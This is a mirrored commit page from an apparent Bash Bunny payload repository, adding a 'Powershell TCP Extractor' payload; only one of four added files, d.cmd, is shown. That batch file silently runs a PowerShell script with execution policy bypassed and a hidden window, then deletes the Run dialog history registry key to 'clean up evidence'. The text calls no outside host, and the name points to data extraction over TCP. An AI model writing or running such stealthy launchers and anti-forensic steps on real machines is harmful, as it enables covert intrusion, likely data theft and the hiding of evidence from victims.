weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added PowershellTCPExtractor (#144)

Browse Source
This commit is contained in:
SirLurkSalot
2017-04-06 23:49:35 -05:00
committed by Sebastian Kinne
parent 19c581613a
commit fc1d812d96
4 changed files with 89 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
payloads/library/Powershell_TCP_Extractor/d.cmd Normal file
View File

@@ -0,0 +1,10 @@
@echo off
Rem run powershell script with bypass,nologo, and hidden flag
Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
REM Delete registry key storing Run dialog history...to clean up evidence
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
@cls
@exit